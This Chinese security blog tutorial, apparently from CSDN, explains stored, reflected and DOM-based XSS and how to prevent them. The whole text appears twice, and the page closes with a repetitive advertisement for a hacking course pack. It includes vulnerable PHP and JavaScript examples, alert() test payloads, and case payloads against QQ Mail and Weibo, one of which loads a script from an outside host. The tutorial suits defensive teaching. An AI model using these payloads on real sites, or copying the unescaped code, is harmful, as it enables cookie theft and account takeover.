详解 XSS 攻击原理更多优质博文请关注听到微笑的博客跨站脚本攻击Cross Site Scripting本来的缩写为CSS为了与层叠样式表Cascading Style SheetsCSS的缩写进行区分将跨站脚本攻击缩写为XSS。因此XSS是跨站脚本的意思。XSS跨站脚本攻击Cross Site Scripting的本质是攻击者在web页面插入恶意的script代码这个代码可以是JS脚本、CSS样式或者其他意料之外的代码当用户浏览该页面之时嵌入其中的script代码会被执行从而达到恶意攻击用户的目的。比如读取cookietoken或者网站其他敏感的网站信息对用户进行钓鱼欺诈等。比较经典的事故有一. 存储型XSS攻击1.1 攻击原理存储型XSS又称为持久型XSS是指攻击者将XSS代码发送给了后端而后端没有对这些代码做处理直接存储在数据库中。当用户访问网站时又直接从数据库调用出来传给前端前端解析XSS代码就造成了XSS攻击。存储型 XSS 的攻击步骤攻击者将恶意代码提交到目标网站的数据库中。用户打开目标网站时网站服务端将恶意代码从数据库取出拼接在 HTML 中返回给浏览器。用户浏览器接收到响应后解析执行混在其中的恶意代码也被执行。恶意代码窃取用户数据并发送到攻击者的网站或者冒充用户的行为调用目标网站接口执行攻击者指定的操作。这种攻击常见于带有用户保存数据的网站功能如论坛发帖、商品评论、用户私信等。1.2 案例某天公司需要一个留言板用户可以自由输入留言内容并提交。代码如下?php $nickname $_POST[nickname];//昵称 $email $_POST[email];//邮箱 $content $_POST[content];//留言内容 $now_time $_POST[now_time];//留言时间 $ini parse_ini_file(config.ini); $con mysql_connect($ini[servername],$ini[username],$ini[password]); if($con){ mysql_query(set names utf8);//解决中文乱码问题 mysql_select_db($ini[dbname]); $sql1 select count(*) from message_board; $result mysql_query($sql1); $floor mysql_fetch_row($result)[0] 1; $sql insert into message_board values($floor,/$nickname/,/$email/,/$content/,/$now_time/); mysql_query($sql); } ?上线后不久小李就在数据库中发现了一些奇怪的留言scriptalert(1)/script打开留言板版后弹出了如下弹框可恶中招了小李眉头一皱查看源代码发现攻击代码已经注入进来二. 反射型XSS攻击2.1 攻击原理反射型XSS又称为做非持久型XSS也是最常用使用最广的一种方式。它是指通过给别人发送带有恶意脚本代码参数的URL当URL地址被打开时特有的恶意代码参数被HTML解析、执行。它的特点是非持久化必须用户点击带有特定参数的链接才能引起。它的根本原因是网站过于信任URL上的参数不经过任何处理直接拼接至页面导致的问题。反射型 XSS 的攻击步骤攻击者构造出特殊的 URL其中包含恶意代码。用户打开带有恶意代码的 URL 时网站服务端将恶意代码从 URL 中取出拼接在 HTML 中返回给浏览器。用户浏览器接收到响应后解析执行混在其中的恶意代码也被执行。恶意代码窃取用户数据并发送到攻击者的网站或者冒充用户的行为调用目标网站接口执行攻击者指定的操作。攻击者可以通过邮件或者搜索引擎等将带有XSS攻击代码的链接投放给用户用户点击链接后页面会从URL上取出对应的参数渲染到页面上此时攻击代码将会被执行。2.2 案例某天公司需要一个搜索页面根据 URL 参数决定关键词的内容。小明很快把页面写好并且上线。代码如下input typetext value% getParameter(keyword) % button搜索/button div 您搜索的关键词是% getParameter(keyword) % /div然而在上线后不久小明就接到了安全组发来的一个神秘链接http://xxx/search?keywordscriptalert(XSS);/script小明带着一种不祥的预感点开了这个链接[请勿模仿确认安全的链接才能点开]。果然页面中弹出了写着”XSS”的对话框。可恶中招了小明眉头一皱发现了其中的奥秘当浏览器请求http://xxx/search?keywordscriptalert(XSS);/script时服务端会解析出请求参数keyword得到scriptalert(XSS);/script拼接到 HTML 中返回给浏览器。形成了如下的 HTMLinput typetext valuescriptalert(XSS);/script button搜索/button div 您搜索的关键词是scriptalert(XSS);/script /div浏览器无法分辨出scriptalert(XSS);/script是恶意代码因而将其执行。这里不仅仅 div 的内容被注入了而且 input 的 value 属性也被注入 alert 会弹出两次。三. DOM型XSS攻击3.1 攻击原理DOM 型 XSS 的攻击步骤攻击者构造出特殊的 URL其中包含恶意代码。用户打开带有恶意代码的 URL。用户浏览器接收到响应后解析执行前端 JavaScript 取出 URL 中的恶意代码并执行。恶意代码窃取用户数据并发送到攻击者的网站或者冒充用户的行为调用目标网站接口执行攻击者指定的操作。DOM 型 XSS 跟前两种 XSS 的区别DOM 型 XSS 攻击中取出和执行恶意代码由浏览器端完成属于前端 JavaScript 自身的安全漏洞而其他两种 XSS 都属于服务端的安全漏洞。3.2 案例某一天前端开发的一个页面需要回显用户在输入框输入的内容代码如下div idxssd_main script function domxss(){ var str document.getElementById(text).value; document.getElementById(dom).innerHTML a hrefstrwhat do you see?/a; } /script input idtext nametext typetext value / input idbutton typebutton valueclick me! onclickdomxss() / div iddom/div /div当用户在输入框输入#onclickalert(1_Ry)时页面的源码渲染为此时如果用户继续点击生成的a标签就会触发脚本。3.3 如何预防DOM型XSS攻击DOM 型 XSS 攻击实际上就是网站前端 JavaScript 代码本身不够严谨把不可信的数据当作代码执行了。在使用.innerHTML、.outerHTML、document.write()时要特别小心不要把不可信的数据作为 HTML 插到页面上而应尽量使用.textContent、.setAttribute()等。如果用 Vue/React 技术栈并且不使用v-html/dangerouslySetInnerHTML功能就在前端 render 阶段避免innerHTML、outerHTML的 XSS 隐患。DOM 中的内联事件监听器如location、onclick、onerror、onload、onmouseover等a标签的href属性JavaScript 的eval()、setTimeout()、setInterval()等都能把字符串作为代码运行。如果不可信的数据拼接到字符串中传递给这些 API很容易产生安全隐患请务必避免。四. XSS攻击的危害上述示例中没有对网站、用户造成实际伤害但是只需要将攻击执行的脚本换成其他恶意代码比如说获取用户Cookie然后通过Ajax请求将获取到的用户Cookie发送至攻击者所搭建的服务器上这样用户登录态就被黑客盗取带来的后果可想而知。但是脚本攻击的危害远远不仅如此包括但不限于通过 document.cookie 盗取 cookie中的信息使用 js或 css破坏页面正常的结构与样式流量劫持通过访问某段具有 window.location.href 定位到其他页面dos攻击利用合理的客户端请求来占用过多的服务器资源从而使合法用户无法得到服务器响应。并且通过携带过程的 cookie信息可以使服务端返回400开头的状态码从而拒绝合理的请求服务。利用 iframe、frame、XMLHttpRequest或上述 Flash等方式以被攻击用户的身份执行一些管理动作或执行一些一般的如发微博、加好友、发私信等操作并且攻击者还可以利用 iframeframe进一步的进行 CSRF 攻击。控制企业数据包括读取、篡改、添加、删除企业敏感数据的能力。五. XSS攻击案例5.1 QQ 邮箱 m.exmail.qq.com 域名反射型 XSS 漏洞攻击者发现http://m.exmail.qq.com/cgi-bin/login?uinaaaadomainbbbb这个 URL 的参数uin、domain未经转义直接输出到 HTML 中。于是攻击者构建出一个 URL并引导用户去点击http://m.exmail.qq.com/cgi-bin/login?uinaaaadomainbbbb%26quot%3B%3Breturnfalse%3B%26quot%3B%26lt%3B%2Fscript%26gt%3B%26lt%3Bscript%26gt%3Balert(document.cookie)%26lt%3B%2Fscript%26gt%3B用户点击这个 URL 时服务端取出 URL 参数拼接到 HTML 响应中script getTop().location.href/cgi-bin/loginpage?autologinnerrtype1verifyclientuinaaatdbbbb;return false;/scriptscriptalert(document.cookie)/script...浏览器接收到响应后就会执行alert(document.cookie)攻击者通过 JavaScript 即可窃取当前用户在 QQ 邮箱域名下的 Cookie 进而危害数据安全。5.2 新浪微博名人堂反射型 XSS 漏洞攻击者发现http://weibo.com/pub/star/g/xyyyd这个 URL 的内容未经过滤直接输出到 HTML 中。于是攻击者构建出一个 URL然后诱导用户去点击http://weibo.com/pub/star/g/xyyydscript src//xxxx.cn/image/t.js/script用户点击这个 URL 时服务端取出请求 URL拼接到 HTML 响应中lia hrefhttp://weibo.com/pub/star/g/xyyydscript src//xxxx.cn/image/t.js/script按分类检索/a/li浏览器接收到响应后就会加载执行恶意脚本//xxxx.cn/image/t.js在恶意脚本中利用用户的登录状态进行关注、发微博、发私信等操作发出的微博和私信可再带上攻击 URL诱导更多人点击不断放大攻击范围。这种窃用受害者身份发布恶意内容层层放大攻击范围的方式被称为“XSS 蠕虫”。本文参考至前端安全系列一如何防止XSS攻击 - 美团技术团队 (meituan.com)学习资源如果你是也准备转行学习网络安全黑客或者正在学习这里开源一份360智榜样学习中心独家出品《网络攻防知识库》,希望能够帮助到你**读者福利 |**CSDN大礼包《网络安全入门进阶学习资源包》免费分享**安全链接放心点击**知识库由360智榜样学习中心独家打造出品旨在帮助网络安全从业者或兴趣爱好者零基础快速入门提升实战能力熟练掌握基础攻防到深度对抗。1、知识库价值深度 本知识库超越常规工具手册深入剖析攻击技术的底层原理与高级防御策略并对业内挑战巨大的APT攻击链分析、隐蔽信道建立等提供了独到的技术视角和实战验证过的对抗方案。广度 面向企业安全建设的核心场景渗透测试、红蓝对抗、威胁狩猎、应急响应、安全运营本知识库覆盖了从攻击发起、路径突破、权限维持、横向移动到防御检测、响应处置、溯源反制的全生命周期关键节点是应对复杂攻防挑战的实用指南。实战性 知识库内容源于真实攻防对抗和大型演练实践通过详尽的攻击复现案例、防御配置实例、自动化脚本代码来传递核心思路与落地方法。2、 部分核心内容展示360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式既夯实基础技能更深入高阶对抗技术。360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式既夯实基础技能更深入高阶对抗技术。内容组织紧密结合攻防场景辅以大量真实环境复现案例、自动化工具脚本及配置解析。通过策略讲解、原理剖析、实战演示相结合是你学习过程中好帮手。1、网络安全意识2、Linux操作系统3、WEB架构基础与HTTP协议4、Web渗透测试5、渗透测试案例分享6、渗透测试实战技巧7、攻防对战实战8、CTF之MISC实战讲解3、适合学习的人群一、基础适配人群零基础转型者适合计算机零基础但愿意系统学习的人群资料覆盖从网络协议、操作系统到渗透测试的完整知识链开发/运维人员具备编程或运维基础者可通过资料快速掌握安全防护与漏洞修复技能实现职业方向拓展或者转行就业应届毕业生计算机相关专业学生可通过资料构建完整的网络安全知识体系缩短企业用人适应期二、能力提升适配1、技术爱好者适合对攻防技术有强烈兴趣希望掌握漏洞挖掘、渗透测试等实战技能的学习者2、安全从业者帮助初级安全工程师系统化提升Web安全、逆向工程等专项能力3、合规需求者包含等保规范、安全策略制定等内容适合需要应对合规审计的企业人员因篇幅有限仅展示部分资料完整版的网络安全学习资料已经上传CSDN朋友们如果需要可以在下方CSDN官方认证二维码免费领取【保证100%免费】1、技术爱好者适合对攻防技术有强烈兴趣希望掌握漏洞挖掘、渗透测试等实战技能的学习者2、安全从业者帮助初级安全工程师系统化提升Web安全、逆向工程等专项能力3、合规需求者包含等保规范、安全策略制定等内容适合需要应对合规审计的企业人员因篇幅有限仅展示部分资料完整版的网络安全学习资料已经上传CSDN朋友们如果需要可以在下方CSDN官方认证二维码免费领取【保证100%免费】
详解 XSS 攻击原理
详解 XSS 攻击原理更多优质博文请关注听到微笑的博客跨站脚本攻击Cross Site Scripting本来的缩写为CSS为了与层叠样式表Cascading Style SheetsCSS的缩写进行区分将跨站脚本攻击缩写为XSS。因此XSS是跨站脚本的意思。XSS跨站脚本攻击Cross Site Scripting的本质是攻击者在web页面插入恶意的script代码这个代码可以是JS脚本、CSS样式或者其他意料之外的代码当用户浏览该页面之时嵌入其中的script代码会被执行从而达到恶意攻击用户的目的。比如读取cookietoken或者网站其他敏感的网站信息对用户进行钓鱼欺诈等。比较经典的事故有一. 存储型XSS攻击1.1 攻击原理存储型XSS又称为持久型XSS是指攻击者将XSS代码发送给了后端而后端没有对这些代码做处理直接存储在数据库中。当用户访问网站时又直接从数据库调用出来传给前端前端解析XSS代码就造成了XSS攻击。存储型 XSS 的攻击步骤攻击者将恶意代码提交到目标网站的数据库中。用户打开目标网站时网站服务端将恶意代码从数据库取出拼接在 HTML 中返回给浏览器。用户浏览器接收到响应后解析执行混在其中的恶意代码也被执行。恶意代码窃取用户数据并发送到攻击者的网站或者冒充用户的行为调用目标网站接口执行攻击者指定的操作。这种攻击常见于带有用户保存数据的网站功能如论坛发帖、商品评论、用户私信等。1.2 案例某天公司需要一个留言板用户可以自由输入留言内容并提交。代码如下?php $nickname $_POST[nickname];//昵称 $email $_POST[email];//邮箱 $content $_POST[content];//留言内容 $now_time $_POST[now_time];//留言时间 $ini parse_ini_file(config.ini); $con mysql_connect($ini[servername],$ini[username],$ini[password]); if($con){ mysql_query(set names utf8);//解决中文乱码问题 mysql_select_db($ini[dbname]); $sql1 select count(*) from message_board; $result mysql_query($sql1); $floor mysql_fetch_row($result)[0] 1; $sql insert into message_board values($floor,/$nickname/,/$email/,/$content/,/$now_time/); mysql_query($sql); } ?上线后不久小李就在数据库中发现了一些奇怪的留言scriptalert(1)/script打开留言板版后弹出了如下弹框可恶中招了小李眉头一皱查看源代码发现攻击代码已经注入进来二. 反射型XSS攻击2.1 攻击原理反射型XSS又称为做非持久型XSS也是最常用使用最广的一种方式。它是指通过给别人发送带有恶意脚本代码参数的URL当URL地址被打开时特有的恶意代码参数被HTML解析、执行。它的特点是非持久化必须用户点击带有特定参数的链接才能引起。它的根本原因是网站过于信任URL上的参数不经过任何处理直接拼接至页面导致的问题。反射型 XSS 的攻击步骤攻击者构造出特殊的 URL其中包含恶意代码。用户打开带有恶意代码的 URL 时网站服务端将恶意代码从 URL 中取出拼接在 HTML 中返回给浏览器。用户浏览器接收到响应后解析执行混在其中的恶意代码也被执行。恶意代码窃取用户数据并发送到攻击者的网站或者冒充用户的行为调用目标网站接口执行攻击者指定的操作。攻击者可以通过邮件或者搜索引擎等将带有XSS攻击代码的链接投放给用户用户点击链接后页面会从URL上取出对应的参数渲染到页面上此时攻击代码将会被执行。2.2 案例某天公司需要一个搜索页面根据 URL 参数决定关键词的内容。小明很快把页面写好并且上线。代码如下input typetext value% getParameter(keyword) % button搜索/button div 您搜索的关键词是% getParameter(keyword) % /div然而在上线后不久小明就接到了安全组发来的一个神秘链接http://xxx/search?keywordscriptalert(XSS);/script小明带着一种不祥的预感点开了这个链接[请勿模仿确认安全的链接才能点开]。果然页面中弹出了写着”XSS”的对话框。可恶中招了小明眉头一皱发现了其中的奥秘当浏览器请求http://xxx/search?keywordscriptalert(XSS);/script时服务端会解析出请求参数keyword得到scriptalert(XSS);/script拼接到 HTML 中返回给浏览器。形成了如下的 HTMLinput typetext valuescriptalert(XSS);/script button搜索/button div 您搜索的关键词是scriptalert(XSS);/script /div浏览器无法分辨出scriptalert(XSS);/script是恶意代码因而将其执行。这里不仅仅 div 的内容被注入了而且 input 的 value 属性也被注入 alert 会弹出两次。三. DOM型XSS攻击3.1 攻击原理DOM 型 XSS 的攻击步骤攻击者构造出特殊的 URL其中包含恶意代码。用户打开带有恶意代码的 URL。用户浏览器接收到响应后解析执行前端 JavaScript 取出 URL 中的恶意代码并执行。恶意代码窃取用户数据并发送到攻击者的网站或者冒充用户的行为调用目标网站接口执行攻击者指定的操作。DOM 型 XSS 跟前两种 XSS 的区别DOM 型 XSS 攻击中取出和执行恶意代码由浏览器端完成属于前端 JavaScript 自身的安全漏洞而其他两种 XSS 都属于服务端的安全漏洞。3.2 案例某一天前端开发的一个页面需要回显用户在输入框输入的内容代码如下div idxssd_main script function domxss(){ var str document.getElementById(text).value; document.getElementById(dom).innerHTML a hrefstrwhat do you see?/a; } /script input idtext nametext typetext value / input idbutton typebutton valueclick me! onclickdomxss() / div iddom/div /div当用户在输入框输入#onclickalert(1_Ry)时页面的源码渲染为此时如果用户继续点击生成的a标签就会触发脚本。3.3 如何预防DOM型XSS攻击DOM 型 XSS 攻击实际上就是网站前端 JavaScript 代码本身不够严谨把不可信的数据当作代码执行了。在使用.innerHTML、.outerHTML、document.write()时要特别小心不要把不可信的数据作为 HTML 插到页面上而应尽量使用.textContent、.setAttribute()等。如果用 Vue/React 技术栈并且不使用v-html/dangerouslySetInnerHTML功能就在前端 render 阶段避免innerHTML、outerHTML的 XSS 隐患。DOM 中的内联事件监听器如location、onclick、onerror、onload、onmouseover等a标签的href属性JavaScript 的eval()、setTimeout()、setInterval()等都能把字符串作为代码运行。如果不可信的数据拼接到字符串中传递给这些 API很容易产生安全隐患请务必避免。四. XSS攻击的危害上述示例中没有对网站、用户造成实际伤害但是只需要将攻击执行的脚本换成其他恶意代码比如说获取用户Cookie然后通过Ajax请求将获取到的用户Cookie发送至攻击者所搭建的服务器上这样用户登录态就被黑客盗取带来的后果可想而知。但是脚本攻击的危害远远不仅如此包括但不限于通过 document.cookie 盗取 cookie中的信息使用 js或 css破坏页面正常的结构与样式流量劫持通过访问某段具有 window.location.href 定位到其他页面dos攻击利用合理的客户端请求来占用过多的服务器资源从而使合法用户无法得到服务器响应。并且通过携带过程的 cookie信息可以使服务端返回400开头的状态码从而拒绝合理的请求服务。利用 iframe、frame、XMLHttpRequest或上述 Flash等方式以被攻击用户的身份执行一些管理动作或执行一些一般的如发微博、加好友、发私信等操作并且攻击者还可以利用 iframeframe进一步的进行 CSRF 攻击。控制企业数据包括读取、篡改、添加、删除企业敏感数据的能力。五. XSS攻击案例5.1 QQ 邮箱 m.exmail.qq.com 域名反射型 XSS 漏洞攻击者发现http://m.exmail.qq.com/cgi-bin/login?uinaaaadomainbbbb这个 URL 的参数uin、domain未经转义直接输出到 HTML 中。于是攻击者构建出一个 URL并引导用户去点击http://m.exmail.qq.com/cgi-bin/login?uinaaaadomainbbbb%26quot%3B%3Breturnfalse%3B%26quot%3B%26lt%3B%2Fscript%26gt%3B%26lt%3Bscript%26gt%3Balert(document.cookie)%26lt%3B%2Fscript%26gt%3B用户点击这个 URL 时服务端取出 URL 参数拼接到 HTML 响应中script getTop().location.href/cgi-bin/loginpage?autologinnerrtype1verifyclientuinaaatdbbbb;return false;/scriptscriptalert(document.cookie)/script...浏览器接收到响应后就会执行alert(document.cookie)攻击者通过 JavaScript 即可窃取当前用户在 QQ 邮箱域名下的 Cookie 进而危害数据安全。5.2 新浪微博名人堂反射型 XSS 漏洞攻击者发现http://weibo.com/pub/star/g/xyyyd这个 URL 的内容未经过滤直接输出到 HTML 中。于是攻击者构建出一个 URL然后诱导用户去点击http://weibo.com/pub/star/g/xyyydscript src//xxxx.cn/image/t.js/script用户点击这个 URL 时服务端取出请求 URL拼接到 HTML 响应中lia hrefhttp://weibo.com/pub/star/g/xyyydscript src//xxxx.cn/image/t.js/script按分类检索/a/li浏览器接收到响应后就会加载执行恶意脚本//xxxx.cn/image/t.js在恶意脚本中利用用户的登录状态进行关注、发微博、发私信等操作发出的微博和私信可再带上攻击 URL诱导更多人点击不断放大攻击范围。这种窃用受害者身份发布恶意内容层层放大攻击范围的方式被称为“XSS 蠕虫”。本文参考至前端安全系列一如何防止XSS攻击 - 美团技术团队 (meituan.com)学习资源如果你是也准备转行学习网络安全黑客或者正在学习这里开源一份360智榜样学习中心独家出品《网络攻防知识库》,希望能够帮助到你**读者福利 |**CSDN大礼包《网络安全入门进阶学习资源包》免费分享**安全链接放心点击**知识库由360智榜样学习中心独家打造出品旨在帮助网络安全从业者或兴趣爱好者零基础快速入门提升实战能力熟练掌握基础攻防到深度对抗。1、知识库价值深度 本知识库超越常规工具手册深入剖析攻击技术的底层原理与高级防御策略并对业内挑战巨大的APT攻击链分析、隐蔽信道建立等提供了独到的技术视角和实战验证过的对抗方案。广度 面向企业安全建设的核心场景渗透测试、红蓝对抗、威胁狩猎、应急响应、安全运营本知识库覆盖了从攻击发起、路径突破、权限维持、横向移动到防御检测、响应处置、溯源反制的全生命周期关键节点是应对复杂攻防挑战的实用指南。实战性 知识库内容源于真实攻防对抗和大型演练实践通过详尽的攻击复现案例、防御配置实例、自动化脚本代码来传递核心思路与落地方法。2、 部分核心内容展示360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式既夯实基础技能更深入高阶对抗技术。360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式既夯实基础技能更深入高阶对抗技术。内容组织紧密结合攻防场景辅以大量真实环境复现案例、自动化工具脚本及配置解析。通过策略讲解、原理剖析、实战演示相结合是你学习过程中好帮手。1、网络安全意识2、Linux操作系统3、WEB架构基础与HTTP协议4、Web渗透测试5、渗透测试案例分享6、渗透测试实战技巧7、攻防对战实战8、CTF之MISC实战讲解3、适合学习的人群一、基础适配人群零基础转型者适合计算机零基础但愿意系统学习的人群资料覆盖从网络协议、操作系统到渗透测试的完整知识链开发/运维人员具备编程或运维基础者可通过资料快速掌握安全防护与漏洞修复技能实现职业方向拓展或者转行就业应届毕业生计算机相关专业学生可通过资料构建完整的网络安全知识体系缩短企业用人适应期二、能力提升适配1、技术爱好者适合对攻防技术有强烈兴趣希望掌握漏洞挖掘、渗透测试等实战技能的学习者2、安全从业者帮助初级安全工程师系统化提升Web安全、逆向工程等专项能力3、合规需求者包含等保规范、安全策略制定等内容适合需要应对合规审计的企业人员因篇幅有限仅展示部分资料完整版的网络安全学习资料已经上传CSDN朋友们如果需要可以在下方CSDN官方认证二维码免费领取【保证100%免费】1、技术爱好者适合对攻防技术有强烈兴趣希望掌握漏洞挖掘、渗透测试等实战技能的学习者2、安全从业者帮助初级安全工程师系统化提升Web安全、逆向工程等专项能力3、合规需求者包含等保规范、安全策略制定等内容适合需要应对合规审计的企业人员因篇幅有限仅展示部分资料完整版的网络安全学习资料已经上传CSDN朋友们如果需要可以在下方CSDN官方认证二维码免费领取【保证100%免费】
